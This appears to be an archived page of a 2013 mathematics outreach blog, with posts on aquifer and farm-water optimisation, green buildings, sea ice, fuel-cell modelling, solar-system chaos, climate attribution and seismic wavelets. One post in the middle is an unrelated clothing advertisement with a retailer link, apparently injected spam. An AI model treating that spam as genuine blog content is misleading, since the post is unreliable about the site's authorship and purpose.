    This problem is one realization of a scenario that is becoming common across the country. Estelle Basor eloquently wrote of the existence of a farming community in the region for generations. (See blog of 4/18/2013.) Agriculture needs, along with increased urbanization, have stressed the underlying aquifer, leading to significant saltwater contamination of water supply wells. The region has been studied for decades, and hydrologists understand the sustainable yield that will prevent further degradation of the resources. Primary crops in the region include strawberries, raspberries, blackberries, blueberries, and lettuce. In fact, as Estelle mentioned in her earlier post, at least 60% of the strawberries produced in the U.S. are grown in this region. (California produces almost 90% of the berries available in a given year!) Strawberries require significant irrigation, so it’s infeasible for an entire farm to be dedicated to strawberries and allow the farmer to operate under the water use limit.

    Our team has designed a 100-acre “model” farm that we have used to forecast profitability and water use given certain planting rules for a variety of crops. We use the model in an optimization framework to give farmers strategies for maintaining their livelihood under restrictions imposed by the water management agency. Our future work will include use of more sophisticated modeling tools for the farm environment and analysis of infiltration networks.

    We are honored to be able to contribute to solving a problem that has wide applicability and environmental impact.

    Lea Jenkins, Clemson University
    Kathleen Fowler, Clarkson University
    John Chrispell, Indiana University of Pennsylvania
    Matthew Farthing, USACE, ERDC
    Matt Parno, MIT

    Posted in Mathematics, Resource Management, Sustainable Development | Leave a comment

    The Mathematics behind Green Buildings


    

Most buildings more than 20 years old are energy “hogs.” They take a lot of energy to heat in the winter, and they take a lot of energy to cool in the summer.  The benefits of saving energy in buildings are enormous:
    • Commercial and residential buildings consume more than 40% of total energy usage in the US, greater than either the transportation or the industrial sector, and this proportion is expected to increase.
    • Buildings contribute 45% of the greenhouse gas emissions linked to global climate change.
    • A 50% reduction in U.S. building energy consumption would be equivalent to taking every passenger vehicle and small truck in the United States off the road.
    • A 70% reduction in U.S. building energy consumption is equivalent to eliminating the entire energy consumption of the United States transportation sector.

    Research is now taking place to make buildings more energy efficient.  The answer lies in the mathematics of control and system theory.  The results of this research will no doubt lead to better designs of new buildings as well.

    

The HVAC system of a large building is very complex.  The key step is to model this complex system.  Heat losses and gains, from the sun, from the heated or cooled air supplies, and from occupants moving through the building, can all be modeled.  Sensors and actuators are placed throughout the HVAC system.  With a mathematical model in hand, one can start performing control and optimization.

    

From June 11-14, 2013, the IMA is offering a Hot Topics Workshop “Mathematical and Computational Challenges in the Control, Optimization, and Design of Energy-Efficient Buildings.” The workshop will present the state of the art in the mathematical and computational aspects that arise in energy-efficient building design. It will also provide participants with the opportunity to share ideas, foster collaboration, and gain a deeper understanding of the problems and challenges of managing and designing energy-efficient buildings and the progress made so far.

    The intended audience for the workshop includes mathematicians, scientists, and engineers interested in the latest developments and challenges in the mathematical and computational sciences for design, optimization, and control of energy-efficient buildings. The workshop will feature a combination of both research talks and tutorials presented by practitioners of diverse disciplines from industry, government, and academia.

    Applications are still being accepted. To view the full description of the workshop and apply on line, click here.

    Submitted by the Institute for Mathematics and its Applications (IMA)

    Posted in Energy, Mathematics | Leave a comment

    How to Reconcile the Growing Extent of Antarctic Sea Ice with Global Warming?

    My colleague Hans Engler (Georgetown University) alerted me to an interesting article in Le Monde of March 31, 2013, entitled “En Antarctique, le réchauffement provoque une extension de la banquise.” The article was based on a technical paper entitled “Important role for ocean warming and increased ice-shelf melt in Antarctic sea-ice expansion,” published online on the same day in Nature Geoscience, co-authored by four climate scientists–R. Bintanja, G. J. van Oldenborgh, S. S. Drijfhout, B. Wouters and C. A. Katsman–from the Royal Netherlands Meteorological Institute (KNMI) in De Bilt, The Netherlands. The problem offers a nice challenge for mathematicians.

    Antarctic Sea Ice (AFP)

    It is well known that sea ice has a significant influence on the Earth’s climate system. Sea ice is highly reflective for incident radiation from the Sun, and at the same time it is a strong insulator for the heat stored in the upper (mixing) layer of the ocean. While global warming causes Arctic sea ice to melt at a measurable and significant rate, sea ice surrounding Antarctica has actually expanded, with record extent in 2010. How can this somewhat paradoxical behavior be reconciled with global warming? Various explanations have been put forth. Usually, the expansion of the Antarctic sea ice is attributed to dynamical atmospheric changes that induce atmospheric cooling. But the authors of the paper present an alternate explanation, which is based on the presence of a negative feedback mechanism.

    The authors claim that accelerated basal melting of Antarctic ice shelves is likely to have contributed significantly to sea-ice expansion. Observations indicate that melt water from Antarctica’s ice shelves accumulates in a cool and fresh surface layer that shields the surface ocean from the warmer deeper waters that are melting the ice shelves. Simulating these processes in a coupled climate model they found that cool and fresh surface water from ice-shelf melt indeed leads to expanding sea ice in austral autumn and winter. This powerful negative feedback counteracts Southern Hemispheric atmospheric warming. Although changes in atmospheric dynamics most likely govern regional sea-ice trends, their analyses indicate that the overall sea-ice trend is dominated by increased ice-shelf melt. Cool sea surface temperatures around Antarctica could offset projected snowfall increases in Antarctica, with implications for estimates of future sea-level rise.

    The problem offers a nice challenge in mathematical modeling. The abstract of the paper can be viewed here. The full text is behind a paywall on the same Web site.

    Posted in Climate Change, Cryosphere | Leave a comment

    Mathematical Modeling of Alternative Energy Systems: An Example of How Academic Mathematicians Can Contribute to the World

    I was asked to write this blog because I am a participant in the upcoming MPE workshop, Batteries and Fuel Cells, running November 4-8 in Los Angeles. This is part of a term-long thematic program, Materials for a Sustainable Energy Future, organized by the Institute for Pure and Applied Mathematics (IPAM) at UCLA. I was invited because I was involved with a decade-long project (1998-2008) modeling hydrogen fuel cells. This was a very applied project in collaboration with scientists at Ballard Power Systems, a Vancouver company that is a world leader in the development of these devices. It was a group project, with several other faculty members participating, notably Keith Promislow who became a close personal friend. In this blog I’ll give a description of what we did on that project. The activity then serves as an example of how academic mathematicians can become involved in work that has a direct impact on the world.

    Hydrogen fuel cells are of interest as an alternative energy technology. They are electrochemical systems that combine hydrogen and oxygen (from air) to produce electrical energy. They have potential for use in many applications, including automotive, stationary power and small-scale power for mobile electronics. Unlike batteries, the energy source (hydrogen gas) flows through the device and so they are not intrinsically limited in capacity. These devices fit into a possible new energy economy in which energy coming from a number of sources including renewable ones is stored as hydrogen gas. Fuel cells have two main benefits over existing technology. They are very efficient when fueled by hydrogen, and the only end product is water, so they are non-polluting in use. It should be said that currently, hydrogen is mainly produced by refining fossil fuels. These devices are now proven technology. However, they are more costly than current technologies. The development of new materials that fuel cell cost and increase their lifetime of use is the current research focus in the industry. Models of the kind of materials used in this industry is the subject of my current research, with Keith.

    The project I was involved with began under the umbrella of MITACS, a Canadian network that supported industrial mathematics activity from 1999 to a few years ago. Actually, MITACS still exists but has broadened its scope to cover all disciplines (so the “M” no longer stands for Mathematics). There were a number of connections that led to the collaboration, but the one that makes the most interesting story starts with John Kenna, who was an engineer at Ballard at that time. He had been trained as a fuel cell engineer, but had worked at Hughes as an aeronautical engineer before coming to Ballard. Most of the design work for aircraft now is done with computational tools. That is, new design ideas are not made as physical models and tested experimentally. Rather, the physics of airflow and the behavior of the aircraft structure in response to stresses while in flight are described (approximately) by mathematical equations. This is the process of “mathematical modeling” in the title of the blog. These equations can’t be solved exactly. For example, there is no way to get a written formula for the air speed at every point around an airplane wing. Thus, the next step is to approximate the solutions to the equations using numerical methods. This field is known as scientific computation and is my original research area. The resulting computational tools can be used to quickly and cheaply test many new airplane designs and optimize performance and safety. So John Kenna came to work at Ballard and with his background expected to have some simulation tools to help with design. However, he discovered that such tools had not yet been developed for the fuel cell industry. He was a guy with vision and thought that these would be a real help to the company. He started by taking a graduate level mathematics course at Simon Fraser University taught by Keith, who was working there at the time. Quite soon, he realized that it would be easier to get Keith involved in the activity than learn the math himself and pushed for the collaborative project with us from within the company.

    Keith and I had funding from MITACS, and Ballard and formed a group to develop models and computational simulation tools for hydrogen fuel cells. They are electrochemical systems that combine hydrogen and oxygen (from air) to produce energy. Rather than generating thermal energy through combustion, they generate electrical power with two electrochemical steps (hydrogen separating into protons and then combining with oxygen to form water) separated by a membrane that only conducts protons. This is shown schematically below. In this picture, the red arrows depict hydrogen movement from channels to catalyst sites, green oxygen movement from channels and blue the movement of product water.

    Electrons travel through an external circuit doing useful work. The membrane is a key element to these devices. There are several types of fuel cells. The ones we looked at were low temperature (80 degrees C) devices in which the membrane is a polymer material with acidic side chains. These are Polymer Electrolyte Membrane Fuel Cells (PEMFC). The electrochemical reactions on either side of the membrane have to be catalyzed to run at appreciable rates. Currently, platinum is used as a catalyst. This is one of the limitations to widespread use since platinum is expensive and rare. Some more details of the processes in the Membrane Electrode Assembly (MEA) between the fuel cell channels is shown below.

    Fuel Cell - Membrane Electrode Assembly

    Much of what we did was modeling, that is writing equations that described processes within a fuel cell and then thinking of ways to compute approximations to these models efficiently. These models were what is known as “multi-scale,” since details of processes from channel to channel (about 1mm) affected performance along the length of the cell (up to 1m long) and a number of cells (up to 100) are combined in a fuel cell stack to make appreciable power. Much of what we did is summarized in the review article, PEM Fuel Cell: A Mathematical Overview if you want to see the technical details.

    I found some pictures from our group from the early years (late 1990s). Shown below from left to right are me (looking young and using an overhead projector!), Keith Promislow, and Radu Bradean who worked with us as a post-doctoral fellow and then went to a position at Ballard. You can see we had fun with this project.

    Brian WettonKeith PromislowRadu Bradean

    As mathematicians, we really brought something to this project and this industry. Standard engineering computational tools such as computational fluid dynamics packages are not a good fit to models from this industry due to their multi-scale nature, the stiff electrochemical reaction rates and the capillary dominated two phase flow in the electrodes.

    However, I have to say that I was initially reluctant to be involved in the project and viewed it as a distraction from my research work at the time on more abstract questions in scientific computation. In hindsight, I am happy I did get involved, but my initial reservation is common to many mathematicians. In my department (Mathematics at the University of British Columbia) I would say that only 10 of 60 faculty members would be open to an interdisciplinary project like the one I described above and this is a higher ratio than most departments. Concentrating on research in a single, technical, abstract area is seen as the best path to professional success. In some departments (not that uncommon) most of the work I did on this project would not count towards professional advancement (tenure and promotion), since it was not mathematics research but rather the use of “known” mathematics in a new application (known to us but not to the application scientists). I am not advocating that all mathematicians should work on such projects: it was the high-level mathematical training I received in a mathematics-focused environment that gave me the skills to contribute to this project. However, I believe such projects should be encouraged and rewarded. Events like MPE2013 highlight the contributions that mathematicians can make to our world, and I am very happy to be a part of it.

    Author Bio: Dr. Brian Wetton was trained at the Courant Institute of NYU. In 1991 he became a faculty member in the Mathematics Department at UBC. He was awarded the Canadian Applied and Industrial Mathematics Society prize for Industrial Mathematics research in 2010 for his work on this project.

    Posted in Energy, Mathematics | Leave a comment

    Improving Algorithms in Climate Codes

    Climate science relies on modeling and computational simulation. Improving the algorithms and codes related to climate modeling is an ongoing research effort. One such example can be found in a talk by Andrew Salinger at the recent SIAM Conference on CS&E; this talk highlighted one of these areas of research – improving solvers in climate codes. These have use in ice sheet simulations, as well as in atmosphere, ocean, and tracer transport applications. For an audio recording of the talk, click here. The abstract for the talk can found here.

    Posted in Climate Modeling, Mathematics | Leave a comment

    Why is celestial mechanics part of MPE2013?

    Since the beginning of MPE2013, I have met people who were surprised when I classified celestial mechanics as a topic that would fit under Mathematics of Planet Earth. But part of celestial mechanics is concerned with planetary motion, and Earth is a planet.

    The toy model for planetary motion is the n-body problem, which describes the motion of n massive particles subject to Newton’s gravitational law. The n-body problem is a purely mathematical problem. The model consists of a system of 3n second-order differential equations. Using the Hamiltonian formalism, one transforms the system into a system of ordinary differential equations in dimension 6n.

    In the 19th century, mathematicians were looking for first integrals, i.e., quantities that would remain constant along the trajectories of the system. Because we expect quasi-periodic solutions (i.e., superpositions of periodic solutions of different periods for the different planets), Weierstrass computed solutions in the form of Fourier series, but he could not show their convergence. The field of the n-body problem experienced its first revolution in 1885, when Poincaré showed that the system was not integrable and that there exist chaotic solutions for which the Weierstrass’ series diverge. The second revolution came with KAM theory in the 1950s and ’60s, following earlier work by Carl Siegel. KAM stands for Kolmogorov, Arnold and Moser. Kolmogorov essentially conjectured the results in 1954, which were later proved in the ’60s by Arnold in the analytic case and by Moser in the smooth case.

    KAM theory is concerned with systems that are close to an integrable system. The solar system is integrable if we neglect the mutual interactions among the planets. Then each planet has a periodic orbit around the Sun, and the system as a whole is quasi-periodic. Since the interaction between planets is small, we are relatively close to an integrable system. What happens then? It depends on the periods of the planets. If the periods of the planets are commensurable, the systems comes back regularly to the same position and the perturbations add up. We call this the resonant case; the corresponding set of initial conditions has measure zero. If we are sufficiently close to the resonant case we are again in the chaotic regime, and if we are far from the resonant case we expect stability. Hence, the initial conditions are intertwined with an open dense set of resonant initial conditions of very small measure corresponding to chaotic motions and a set of nearly full measure for which we have stable quasi-periodic motions. To the famous question: “Is the solar system stable?” we would have answered in the 1970s: “Yes, if we have the right initial condition.”

    Now we know more. We know that the solar system is too far from an integrable system to enable us to apply KAM theory directly. But the spirit of KAM theory remains. We know that resonances are responsible for chaotic motions, and when we find some chaotic motions we look for the resonances that could have been responsible for them.

    Jacques Laskar made an extensive study of the solar system. In 1994 he gave numerical evidence that the inner planets (Mercury, Venus, Earth and Mars) have chaotic motions and identified the resonances responsible for their chaotic behavior. Because of the sensitivity to initial conditions, numerical errors grow exponentially, so it is impossible to control the positions of the planets over long periods of time (hundreds of millions of years). In his simulations, Laskar used therefore an averaged system of equations. The simulations showed that the orbit of Mercury could cross that of Venus for some period of time. Laskar could explain this chaotic behavior by exhibiting resonances in some periodic motions of the orbits of the inner planets.

    Another way to study chaotic systems is to make numerous simulations in parallel with close initial conditions and deriving probabilities of future behaviors. The shadowing lemma guarantees that a simulated trajectory resembles a real trajectory for a close initial condition. In a letter published in Nature [“Existence of collisional trajectories of Mercury, Mars and Venus with the Earth,” Nature 459, 817-819 (11 June 2009) | doi:10.1038/nature080962009], Laskar and M. Gastineau announced the results of an ambitious program of 2000 parallel simulations of the solar system over periods of the order of 5 billion years. The new model of the solar system was much more sophisticated and included some relativistic effects. The simulations showed a 1% chance that Mercury could be destabilized and encounter a collision with the Sun or Venus. A much smaller number of simulations showed that all the inner planets could be destabilized, with a potential collision between the Earth and either Venus or Mars, in around 3.3 billion years.

    Christiane Rousseau

    Posted in Astrophysics, General, Mathematics | 2 Comments

    National Environmental Education Week, Green Ribbon Schools, and Earth Day

    This week (April 14-20) is National Environmental Education Week. Secretary of Education Arnie Duncan talks about the importance of linking STEM education with environmental education as a way to prepare students for the 21st century.

    Monday April 22 is Earth Day! On that day, the U.S. Department of Education will announce the winners of the second annual Green Ribbon School awards. These awards are given to schools that are exemplary in reducing environmental impact and costs; improving the health and wellness of students and staff; and providing effective environmental and sustainability education, which incorporates STEM, civic skills and green career pathways.

    The Sustainability Counts! section of the Mathematics Awareness Month website provides a number of model lessons that demonstrate how one can incorporate mathematics into sustainability education. With the growing interest at the K-12 level in teaching about sustainability, there is a growing market for high quality materials that link mathematics to sustainability. Mathematicians in the MPE2013 network are encouraged to develop such materials as a component of their work.

    At Bryn Mawr College, we will be celebrating Earth Day tomorrow on Saturday, April 20. There will be a wide range of activities around the environment that student groups have organized. I will be contributing an activity called “When will all the ice be gone?” based on a math unit that looks at the extent if sea ice in the Arctic. The challenge is to use the data on sea ice extent over the past decade to predict in which year the Arctic will first become completely free of ice. I will be offering a $50 prize to the winner. The catch is – they may have to wait awhile to claim their prize. Take a look at the beautiful and thought provoking video A New Climate State: Arctic Sea Ice 2012 to learn more about the Arctic sea ice melt.

    Lincoln High School On Friday, I will be attending the Earth Day celebration at Abraham Lincoln High School in Philadelphia, which will include the kick-off for their “Renewable Energy and Energy Conservation” mural, which they will paint over the next two years. I look forward to celebrating the excellent work of the students and their teachers – and awarding the school copies of our Mathematics of Sustainability poster.

    Victor Donnay
    Chair, Mathematics Awareness Month Advisory Committee
    Professor of Mathematics
    Bryn Mawr College

    Posted in General, Sustainable Development | Leave a comment

    Mpe.Dimacs.Rutgers.Edu x Dress Head Polka Dot Skater Dress

    Mpe.Dimacs.Rutgers.Edu x Dress Head Polka Dot Skater Dress – V-Neck / Three-Quarter Length Sleeves

    Polka dots are making a huge comeback, so is this Mpe.Dimacs.Rutgers.Edu x http://www.dresshead.com/c/skater-dress/ adorable navy blue skater dress with white polka dots and three-quarter length sleeves is a great garment. Dress has a narrow belted waist made from the same polka dotted material. The sleeves have a slim cuff with a single button on each sleeve. The left shoulder is accented with a fabric bow that rests on the center of the shoulder. This is a moderately short dress, which shows off your legs as the hemline is just above the knee. This dress is designed with “V” neckline the dips down to show your bosom. Accessories make the outfit, so the right pair of shoes, such as a pair of white high heels would look excellent with this dress. Small size; length is 74.5 cm, and bust is 88 cm.

    Posted in General | Leave a comment

    Raspberry Fields Forever

    Today is my father’s birthday. If he were alive he would be 110 years old! My father, Steve Basor, was born to immigrant parents in Lead, South Dakota, in 1903 but left there when he was very small with his parents who returned to live in the tiny village of Dunave, Croatia (then part of the Austrian empire). He went to the local village school, helped with the family farm, and then after living in Argentina for five years, returned to the United States in 1931. He settled in Watsonville, California, and farmed in the Pajaro Valley, close to the Monterey Bay. Watsonville had a large population of Croatians, most from the Konavle Valley, and almost all were involved in farming. My father was an apple grower, as were many of his friends and relatives. It was from him that I got my love of farming and also my love of mathematics. He knew many math facts, games, and puzzles that he taught to me when I was young. The following tells how the two interests combined.

    The Pajaro Valley is ideally suited for agriculture. When my father farmed one could see acres and acres of fruit trees, but these were slowly replaced by crops of vegetables, berries, and flowers. In fact, the Pajaro Valley and the nearby Salinas Valley produce nearly half of the 2 billion pounds of strawberries grown in the United States annually. The water source for the valley is a confined underground aquifer, which is slowly being depleted. Estimates for the overdraft vary, but the amount of water being used each year is between 125% and 150% of the sustainable yield. The overdraft creates a problem of salt water intrusion along the coast, making many coastal wells unusable, and lowers the water table over the entire valley.

    In January of 2011, AIM held a Sustainability Problems workshop, with the goal of bringing together mathematicians and industry representatives to work on a variety of sustainability problems, including renewable energy, air quality, water management, and other environmental issues. It seemed to me that it might be possible to get berry growers to team with the mathematicians to help with the overdraft problem. I still have farming ties in the valley and asked Driscoll’s, whose associated growers are the largest supplier of fresh berries in North America, whether they were interested. To my delight, the Driscoll’s representatives agreed to come to the workshop.

    So three Driscoll’s employees teamed up with nine applied mathematicians to evaluate how various water and land management techniques could be utilized by landowners and growers to work towards balancing aquifer levels. During the week of the workshop and with followup activity in an AIM SQuaRE program, the team has made significant progress in the creation of a virtual farm model to study alternative crop management strategies and their effect on water usage and profit. The model uses an optimization framework (with over 200 constraints) to maximize profit while meeting a water budget constraint. According to Dan Balbas, Vice President for Operations for Reiter Affliated Companies, (a Driscoll’s associated grower), “the results of the optimization program validated much of what the growers thought before and gave validation and new information to our crop growing strategies.” The team also investigated a surface water analysis to understand feasible ways to capture rainfall for reinfiltration (or recharging) into the aquifer.

    Driscoll’s has also spearheaded a community effort to help solve the overdraft problem. Pajaro Valley community members are working in smaller groups on a number of additional strategies, including the determination and promotion of best practices for irrigation and the identification of the most promising areas in the valley for aquifer recharge projects (a fluid flow problem!). The community effort to solve the water problem is a remarkable model for bringing together groups with very different goals and experiences and finding common ground.

    I am pleased to report that the SQuaRE group is back at AIM this week and should have a future report very soon about progress, including the recharge efforts.

    Estelle Basor
    AIM

    Posted in Mathematics, Resource Management, Sustainable Development | 2 Comments

    Math-to-Bio? Yes, but also Bio-to-Math!

    As can be seen from numerous entries in this blog, mathematics, statistics, and the computational sciences are having impact and influence on a wide array of disciplines that fall under the umbrella of Mathematics of Planet Earth. In fact, in his book “The Mathematics of Life,” Ian Stewart cites the following five revolutions in biology:

    – the invention of the microscope,
    – the systematic classification of the planet’s living creatures,
    – the theory of evolution,
    – the discovery of the gene, and
    – the discovery of the structure of DNA.

    He then expresses the idea that a sixth is on its way: the application of mathematical insight to biological processes. (For a review of the book by John Adam in the AMS Notices, click here.)

    However, another exciting aspect of the relationship between mathematics and biology is the potential — the expectation even — that biology will provide the impetus for new mathematics, and that the feedback loop between mathematics and biology will be at least as influential and exciting as the one mathematics and physics has enjoyed for over 2000 years.

    An excellent place to get a feel for this growing relationship is in Joel Cohen’s essay “Mathematics Is Biology’s Next Microscope, Only Better; Biology Is Mathematics’ Next Physics, Only Better”.

    In a related vein, NSF’s Mathematical Biosciences Institute (MBI) hosted the meeting “Math Biology: Looking at the Future” in September 2012. At this meeting, 11 distinguished speakers talked about areas at the interface of mathematics and biology where exciting progress has been made in recent years and where future advances can be expected. Titles and abstracts — and full lecture video for most of the talks — can be found here.

    Whether it’s Math-to-Bio, Bio-to-Math, or both, it’s an exciting time to be exploring and expanding the interface.

    Tony Nance
    MBI

    Posted in Biology, General, Mathematics | Leave a comment

    Arctic Sea Ice and Cold Weather

    Could the cold weather experienced this winter in the northern part of the Eurasian continent be related to the decrease in Arctic sea ice? This question is the subject of much debate in the media in Europe. This post shows some relevant weather maps and links to several relevant blogs and articles.

    Temperature distribution

    First, what does the unusual temperature distribution observed this March actually look like? Here is a map showing the data (up to and including March 25, NCEP / NCAR data plotted with KNMI Climate Explorer):

    Mean Temperature at 2m, March 2013

    Freezing cold in Siberia, reaching across northwestern Europe, unusually mild temperatures over the Labrador Sea and parts of Greenland and a cold band diagonally across North America, from Alaska to Florida. Averaged over the northern hemisphere the anomaly disappears – the average is close to the long-term average. Of course, the distribution of hot and cold is related to atmospheric circulation, and thus the air pressure distribution. The air pressure anomaly looks like this:

    Mean SLP, March 2013

    There was unusually high air pressure between Scandinavia and Greenland. Since circulation around a high is clockwise [anticyclone], this explains the influx of arctic cold air in Europe and the warm Labrador Sea.

    Arctic sea ice

    Let us now discuss the Arctic sea ice. The summer minimum in September set a new record low, but also at the recent winter maximum there was unusually little ice (ranking 6th lowest – the ten years with the lowest ice extent were all in the last decade). The ice cover in the Barents sea was particularly low this winter. All in all, until March the deficit was about the size of Germany compared to the long-term average.

    Is there a connection with the winter weather? Does the shrinking ice cover influence the atmospheric circulation, because the open ocean strongly heats the Arctic atmosphere from below? (The water is much warmer than the overlying cold polar air.) Did the resulting evaporation of sea water moisten the air and thus lead to more snow?

    Here are links to some blogs where this problem is discussed: Neven Blog, Rabett Blog, SciLogs.

    Here are three references taken from Rabett Blog:

    Jaiser R, Dethloff K, Handorf D, Rinke A, Cohen J (2012) Impact of sea ice cover changes on the Northern Hemisphere winter atmospheric circulation.Tellus Series A-Dynamic Meteorology and Oceanography 64, doi: 10.3402/tellusa.v64i0.11595

    Liu JP, Curry JA, Wang HJ, Song MR, Horton RM (2012) Impact of declining Arctic sea ice on winter snowfall. Proceedings of the National Academy of Sciences of the United States of America 109 (11) :4074-4079, doi: 10.1073/pnas.1114910109

    Petoukhov V, Semenov VA (2010) A link between reduced Barents-Kara sea ice and cold winter extremes over northern continents. Journal of Geophysical Research-Atmospheres 115, D21111, doi: 10.1029/2009jd013568 (Abstract is free; article is behind a pay wall.)

    Posted in Cryosphere, General, Weather | Leave a comment

    Extreme Weather Event

    Tuesday April 9, 2013

    (High of 65 — felt like 72 or so — and winds at 25mph, gusting
    to 33mph. Record high for Worcester on April 9 is 77.)

    It was unusually warm and windy for early April. We piled into the toasty lecture hall with drinks and sandwich wraps in hand. Dr. Smith, with his shock of white hair and the thin frame of a marathon runner, shed his sport jacket as he recounted the 2003 European heat wave which some claim to have caused up to 70,000 deaths; the 2010 Russian heatwave; the floods in Pakistan that same year; and the devastation Hurricane Sandy last year.

    Trained as a probabilist and currently the Director of SAMSI and a professor of Statistics at UNC Chapel Hill, Richard Smith guided the audience through the challenges of doing reliable science in the study of climate change. Rather than address the popular question of whether recent climate anomalies are out of the statistical norm of recent millenia (and other research strongly suggests they are), Dr. Smith asked how much of the damage is attributable to human behaviors such as the emission of greenhouse gases from the burning of fossil fuels.

    Demonstrating a deep familiarity with the global debate on climate change and the reports of the IPCC (Intergovernmental Panel on Climate Change), Professor Smith discussed the statistical parameter “fraction of attributable risk” (FAR), which is designed to compare the likelihood of some extreme weather event (such as a repeat of the European heat wave) under a model that includes anthropogenic effects versus the same value ignoring human factors.

    Employing the rather flexible Generalized Extreme Value Distribution (GEV) and Bayesian Hierarchical Modeling, Dr. Smith walked the audience of 40+ through an analysis of the sample events mentioned above, giving statistically sound estimates of how likely an event is to occur given anthropogenic effects versus without them. Smith explained how a strong training in statistics guides one to the choice of the GEV distribution as a natural model for such events; this distribution involves a parameter xi which allows us to accurately capture the length of the tail of our observed distribution.

    Perhaps the most compelling graphs were plots of the estimated changes in predicted extreme weather events over time. One such plot is included below, giving the probability of a repeat of an event in Europe similar to the 2003 heat wave, with posterior median and quartiles marked in bold and a substantial confidence interval shaded on the plot.

    Europe Probability vs. Year

    One intriguing aspect of this cleverly designed talk was a digression about computational climate models. The NCAR Wyoming Supercomputing Center in Cheyenne, houses the notorious “Yellowstone” with its 1.5 petaflop capabilities and 144.6 terabyte storage farm, which will cut down the time for climate calculations and provide much more detailed models (reducing the basic spacial unit from 60 square miles down to a mere 7). Dr. Smith explained the challenge of obtaining and leveraging big data sets and amassing as many reliable runs of such climate simulations as possible to improve the reliability of the corresponding risk estimates. The diverse audience encountered a broad range of tools and issues that come into play in the science of climate modeling, and we all had a lot to chew on as a result of this talk.

    A lively question and answer period ensued with questions about methodology, policy, volcanoes versus vehicles, and where to go from here to make a difference. Then we all poured out into the heat of an extremely warm April afternoon, pondering whether this odd heat and wind was normal for a spring day in Massachusetts.

    Dr. William J Martin,
    Professor, Mathematical Sciences and Computer Science
    WPI

    Posted in Climate, General, Statistics, Weather | Leave a comment

    The Interplay Between Mathematical Models, Massive Data Sets, and Climate Science

    Mathematical modeling and data analysis play a critical role in the mathematics of Planet Earth. This theme was brought home in a panel discussion “Big Data Meets Big Models,” particularly in the presentation by Anna Michalak.

    The general public is generally aware of how models are used for weather prediction, but perhaps a bit less aware of how modeling and the ability to process and analyze large data sets plays a critical role in climate science. However, mathematical models are necessary to understand the many aspects of climate science and underlie our ability to predict future changes. One example lies in the complex interplay of carbon – its transition from sources (like the burning of fossil fuels) through the ocean, air, land and biosphere.

    A critical component to understanding the role of carbon dioxide (CO2) in global warming is this global carbon cycle – the transmission of carbon through ocean, atmosphere, and land. Human activities produce several gigatons of carbon per year; some fraction of this is absorbed by plants, oceans, and other mechanisms. Having a better quantitative understanding of the natural carbon sinks is essential for better predictions of the future. This leads to a need for better measurements of the carbon cycle to ensure that we have good data upon which to base our models. And there is also a need for improved monitoring as states may agree to limit carbon emissions.

    This has led to a major infrastructure project to gather data from observations. FluxNet, a “network of regional networks,” coordinates regional and global analysis of observations from micro-meteorological tower sites. The flux tower sites use eddy covariance methods to measure the exchanges of carbon dioxide, water vapor, and energy between terrestrial ecosystems and the atmosphere.
    The idea is to gather massive amounts of data on CO2 along with data on rainfall and fires to better calibrate carbon transmission. The various sites around the world will gather vast amounts of data. Since we often can’t obtain data on the quantities we want but rather on a related variable, there is a need for improved mathematical models related to these variables, in order to make sense of the massive amounts of data to be collected. Thus mathematical models will be required to fill in the gaps (since data is only located at spatially dispersed sites, for example) – an example of the interplay between mathematical models, massive data sets, and climate science.

    Posted in Carbon Cycle, Climate Modeling | Leave a comment

    Mathematicians listen as the Earth rumbles…

    “Mathematicians listen as the Earth rumbles… ” This was the title of the fourth MPE Simons Lecture given by Ingrid Daubechies in Montreal, Canada, on April 10. Her splendid lecture was delivered in French, but both English and French videos of the lecture will be on display soon on the Simons website.

    Too often, we limit Mathematics of Planet Earth to climate change and sustainability problems. On the contrary, this lecture was totally fitting under the first theme of MPE, namely a “planet to discover”. The lecture of Ingrid Daubechies was related to her personal work with geophysicists and very recent results on the problem of understanding the formation of the volcanic islands.

    The rocks in the bottom floor of the oceans are much younger than those of the continents. On the bottom of the oceans, the most recent rocks are along the ridges where tectonic plates diverge. And indeed, there is volcanic activity along these ridges, with new rocks being formed by magma coming up from the mantle to the surface. But there are also isolated volcanic islands, like Hawaii, Tahiti, the Azores, Cap Verde, etc. If we look to the archipelago of Hawaii, all islands are aligned, and their age increases from the largest island at one end to the smaller islands further down. This has suggested to the geophysicists that the islands were formed because of a plume, i.e., a kind of volcanic chimney through the mantle. Recall that the mantle goes as deep as half the radius of the Earth. Since the surface plate is moving, this could explain the successive formation of the aligned islands, the difference of age of which would be calculated from the distance between the islands and the speed of the tectonic plates.

    But additional evidence is needed for the conjecture to be accepted by the scientific community. For instance, one would like to “see” the plume. One tool for exploring the interior structure of the Earth is remote sensing: one sends waves (signals) and analyzes the signals reflected by the boundary of some layer or refracted inside different layers. But plumes are located so deep under the Earth’s crust that the usual signals are not powerful enough to be of any help. The only waves that carry sufficient energy to analyze details at such a depth are the seismic waves generated by large earthquakes.

    Large databases exist which contain the recordings of these seismic waves by seismic stations around the world. So the data exist. We then need an appropriate tool to analyze them. The problem is not trivial. The plumes are very thin regions and, moreover, the difference of the speed of a seismic wave through a plume is only of the order of 1%.

    In 2005, seismologists Tony Dahlen and Guust Noleta approached Ingrid Daubechies to see if wavelets could help in their venture. Indeed, the promising results of the student Raffaela Montelli (pictured) had shown that seismic methods could be used to capture regions of perturbations of the pressure waves (P-waves) of earthquakes, see figure.
    Pwave Velocity Perturbations
    Such regions overlapped exactly the regions with isolated volcanic islands: the temperature of the ocean floor was higher in these regions. But, as mentioned above, the plumes are very thin and the difference of speed of seismic P-waves very small in these regions. Hence, there is a large risk of errors in the numerical reconstruction of the inner structure of the Earth, unless we use an appropriate tool. This is where wavelets proved useful. They are the perfect tool to analyze small localized details. Moreover, one can concentrate all the energy in small regions and neglect the other regions.

    In her lecture, Ingrid Daubechies gave a short course on wavelets adapted to digital images made of pixels. A gray-tone image is just an array of numbers giving the gray tone of each pixel. From this matrix, one constructs four smaller matrices consisting of either horizontal or vertical averages of neighboring pixels taken 2 by 2, or horizontal or vertical differences of neighboring pixels taken 2 by 2. One can iterate the process on the matrix of horizontal and vertical averages. She explained how wavelets allow compressing information and how we can extract very fine details in a local region while keeping the size of the data manageable. The use of wavelets to construct the images allows removing all errors in numerical reconstructions and making sure that the special zones identified in the image are indeed special. She showed clean images produced with wavelets in which artificial special regions had been removed, and she could announce “hot off the press” that she and her collaborators had obtained the first results with the whole Earth, and real data!

    Christiane Rousseau

    A report on Dr. Daubechies lecture.

    Posted in General, Geophysics, Imaging, Mathematics | Leave a comment

    Next Generation Science Standards

